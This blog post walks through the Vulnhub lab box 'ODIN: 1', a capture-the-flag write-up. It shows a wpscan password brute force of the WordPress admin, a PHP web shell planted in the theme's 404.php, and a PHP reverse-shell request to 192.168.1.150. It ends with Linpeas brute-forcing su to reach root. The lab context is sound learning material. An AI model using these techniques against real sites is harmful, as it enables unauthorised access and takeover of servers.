---
layout: post
title:  "Vulnhub - ODIN: 1"
date:   2020-12-16 21:00:00 +1100
category: hacking
---

## Introduction
*Difficulty: Easy  
Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from it, asked him to sacrifice his left eye, this being a symbol of his will to obtain knowledge*

This is [ODIN: 1](https://www.vulnhub.com/entry/odin-1,619/) from Vulnhub. 

## Ports
HTTP only.

## HTTP
It says:

>vikingarmy  
Just another Joomla site

But that's a little joke because it's actually wordpress. 

``
root@kali:/opt/vulnhub/odin# wpscan -e --url http://odin
``

**wp-scan** only finds a user called 'odin', but trying to login at *wp-admin* with any random password gives an error: 

>Unknown username. Check again or try your email address.

So that's curious. What if we try *admin*? 

>Error: The password you entered for the username admin is incorrect

Right. So *admin* exists; *odin* does not. What's up with that, *wp-scan*? Lol.

We also have some encoded strings on the blog:

>NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC
63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTU
MFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===

This is base32:

>https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist

We have this:

>SWYgeW91IGxvb2sgY2xvc2VseSwgeW91IHdvbid0IG5lZWQgaXQgaGVyZQo=

Which is base64:

>If you look closely, you won't need it here

And this:

>++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++.+.+++++.————.+.+++++.——-.

Which appears to be brainf^%k, which translates to:

>nottuzy

Which never appears to be useful.

So a password attack on admin? Yes.

{% highlight shell %}
root@kali:/opt/vulnhub/odin# wpscan -U admin -P /usr/share/wordlists/rockyou.txt --url http://odin
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / qwerty                                                                                                        
Trying admin / ashley Time: 00:00:03 <                                                     > (20 / 14344412)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: qwerty
{% endhighlight %}

## wp-admin
One of the blog posts is called:

>Twenty Twenty: 404 Template (404.php)

Wonder if that is a hint?

We can edit the file here:

>http://odin/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty

And add:

``
<?php system($_GET['cmd']);?>
``

into the upper part of the file beneath the opening html tag. We can then access the file at:

>http://odin/wp-content/themes/twentytwenty/404.php?cmd=id

And issue commands. Like a shell. Like this:

``
GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.150",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
``

## On the box
We can login to mysql with joomla:joomla and grab some hashes but they don't want to break easily, but there is a shortcut here. [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) has a mode (**-a**) that will brute force **su**. And we have weak passwords:

{% highlight shell %}
[+] Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds
  Bruteforcing user root...                                                                                                                               
  You can login as root using password: jasmine
  Bruteforcing user osboxes...
  Bruteforcing user voldemort...
  Bruteforcing user rockyou...
  You can login as rockyou using password: rockyou
{% endhighlight %}

So really that's it; let's check it:

{% highlight shell %}
rockyou@osboxes:~$ su root
su root
Password: jasmine

root@osboxes:/home/rockyou# 
root@osboxes:/home/osboxes# cd /root
cd /root
root@osboxes:~# ls -lash
ls -lash
total 48K
4.0K drwx------  7 root root 4.0K Dec 16 03:24 .
4.0K drwxr-xr-x 23 root root 4.0K Jul  5 22:43 ..
4.0K drwx------  2 root root 4.0K Jun 24 17:24 .aptitude
4.0K -rw-------  1 root root    1 Dec  4 15:57 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
4.0K -rw-r--r--  1 root root  109 Dec  5 08:34 bjorn
4.0K drwx------  6 root root 4.0K Dec  4 15:36 .cache
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .config
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .dbus
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .local
4.0K -rw-r--r--  1 root root  161 Dec  5  2019 .profile
4.0K -rw-r-----  1 root root    4 Dec 16 03:24 .vboxclient-display-svga.pid
root@osboxes:~# file bjorn
file bjorn
bjorn: UTF-8 Unicode text
root@osboxes:~# cat bjorn
cat bjorn
cσηgяαтυℓαтιση

Have a nice day!


aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=
root@osboxes:~# echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=' | base64 -d
<ViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=' | base64 -d
https://www.youtube.com/watch?v=VhkfnPVQyaY
root@osboxes:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
osboxes
root@osboxes:~#
{% endhighlight %}
